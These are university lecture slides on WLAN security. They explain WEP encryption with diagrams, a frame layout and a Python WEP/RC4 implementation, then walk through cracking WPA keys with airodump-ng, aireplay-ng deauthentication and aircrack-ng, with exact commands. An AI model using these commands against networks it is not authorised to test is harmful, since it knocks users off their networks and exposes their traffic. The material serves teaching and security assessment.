WLAN Security: Cracking WEP/WPA
Assoc. Prof. Anan Phonphoem, Ph.D. (รศ. ดร. อนันต์ ผลเพิ่ม)
[email protected]
http://www.cpe.ku.ac.th/~anan
Computer Engineering Department
Kasetsart University, Bangkok, Thailand
Wireless LANs 2011
WEP Block Diagram
[Diagram: Encryption Block (Sender Site) and Decryption Block (Receiver Site). Labels: Integrity Algorithm (CRC-32), Pseudo-Random Number Generator (RC-4), Bitwise XOR, Plain Text, Cipher Text, Integrity Check Value (ICV), Key Sequence, Secret Key (40-bit or 128-bit), Initialization Vector (IV).]
Sender Site (Encryption Block): the Integrity Algorithm (CRC-32) computes the ICV over the Plain Text; the IV is concatenated (+) with the Secret Key (40-bit or 128-bit) and fed to the RC-4 Pseudo-Random Number Generator, which outputs the Key Sequence; Plain Text plus ICV is Bitwise XORed with the Key Sequence to give the Cipher Text, and the IV is sent along with it.
Receiver Site (Decryption Block): the received IV and the Secret Key are fed to the same Pseudo-Random Number Generator to regenerate the Key Sequence; the Cipher Text is Bitwise XORed with it to recover the Plain Text and ICV; the Integrity Algorithm is run over the recovered Plain Text and the result is compared with the received ICV.
WEP – Encoding
[Diagram: the Encryption Block of the WEP Block Diagram above. Labels: Integrity Algorithm (CRC-32), Pseudo-Random Number Generator (RC-4), +, Bitwise XOR, Plain Text, Cipher Text, Integrity Check Value (ICV), Key Sequence, Secret Key (40-bit or 128-bit), Initialization Vector (IV).]
WEP Frame
[Diagram: frame layout]
Frame Header | IV Header (4 bytes) | Frame Body | ICV (4 bytes) | Trailer FCS
Encrypted: Frame Body and ICV. Clear Text: Frame Header, IV Header and Trailer FCS.
WEP – Decryption
[Diagram: the Decryption Block of the WEP Block Diagram above. Labels: Integrity Algorithm, Pseudo-Random Number Generator, Bitwise XOR, Cipher Text, Plain Text, Integrity Check Value (ICV), Key Sequence, IV, Secret Key (40-bit or 128-bit).]
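The encryption and decryption blocks of the diagrams above, written out as an added example (not code from the lecture): RC-4 seeded with IV + secret key gives the key sequence, CRC-32 gives the ICV, and a bitwise XOR joins them. The key and IV values are constructed for the demonstration.

```python
import struct
import zlib

# Added example, not from the lecture: WEP encryption/decryption blocks.
# Key and IV below are constructed sample values.
SECRET_KEY = bytes.fromhex("0102030405")  # 40-bit secret key
IV = bytes.fromhex("000001")              # 24-bit initialization vector


def rc4_keystream(seed: bytes, length: int) -> bytes:
    """Pseudo-Random Number Generator (RC-4): key schedule, then output bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + seed[i % len(seed)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def key_sequence(iv: bytes, secret_key: bytes, length: int) -> bytes:
    """Key Sequence = RC-4(IV + Secret Key); it depends only on the IV and the key."""
    return rc4_keystream(iv + secret_key, length)


def icv(plain: bytes) -> bytes:
    """Integrity Check Value: CRC-32 of the plain text, sent little-endian."""
    return struct.pack("<I", zlib.crc32(plain) & 0xFFFFFFFF)


def wep_encrypt(plain: bytes, secret_key: bytes, iv: bytes) -> bytes:
    """Sender site: Cipher Text = (Plain Text || ICV) XOR Key Sequence."""
    ks = key_sequence(iv, secret_key, len(plain) + 4)
    return bytes(a ^ b for a, b in zip(plain + icv(plain), ks))


def wep_decrypt(cipher: bytes, secret_key: bytes, iv: bytes):
    """Receiver site: regenerate Key Sequence, XOR, recompute ICV. None on mismatch."""
    ks = key_sequence(iv, secret_key, len(cipher))
    recovered = bytes(a ^ b for a, b in zip(cipher, ks))
    plain, received_icv = recovered[:-4], recovered[-4:]
    return plain if icv(plain) == received_icv else None
```

Because the key sequence is fixed by the IV and key alone, two frames sent under the same IV are XORed with the same key sequence; this is why the capture step below stores the IVs of collected frames.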
Cracking Steps
1) Reconnaissance (Collect target info.) [kismet]
2) Run promiscuous mode [iwconfig, airmon]
3) Collect data [airodump]
4) Crack key [aircrack]
Airodump problem
root@APMoose:~/toulouse# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
/dev/rfkill is the Linux kernel subsystem for controlling radio transmitters (activated/deactivated).
anan@APMoose:~$ rfkill list
0: phy0: Wireless LAN
Soft blocked: no    (soft block: software can reactivate)
Hard blocked: no    (hard block: software cannot reactivate)
1: acer-wireless: Wireless LAN
Soft blocked: no
Hard blocked: no
2: acer-bluetooth: Bluetooth
Soft blocked: no
Hard blocked: no
4: hci0: Bluetooth
Soft blocked: no
Hard blocked: no
Solve by:
root@APMoose:~/toulouse# rfkill unblock all
Cracking Steps
1) Start the wireless interface in monitor mode on the specific AP channel
2) Start airodump-ng on the AP channel with a filter for the bssid to collect the authentication handshake
3) Use aireplay-ng to deauthenticate the wireless client
4) Run aircrack-ng to crack the pre-shared key using the authentication handshake
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Start airodump-ng
Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0
Parameter                   Description
-c 6                        Wireless channel
--bssid 00:1E:F7:xx:xx:xx   AP’s MAC address
-w psk                      File name prefix for the capture files (containing the IVs)
mon0                        Interface name
aireplay
Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0
Parameter                   Description
-0                          Deauthentication mode
1                           Number of deauthentication frames sent
-a 00:12:01:xx:xx:xx        AP’s MAC address
-c 00:23:11:xx:xx:xx        MAC address of the client being deauthenticated
mon0                        Interface name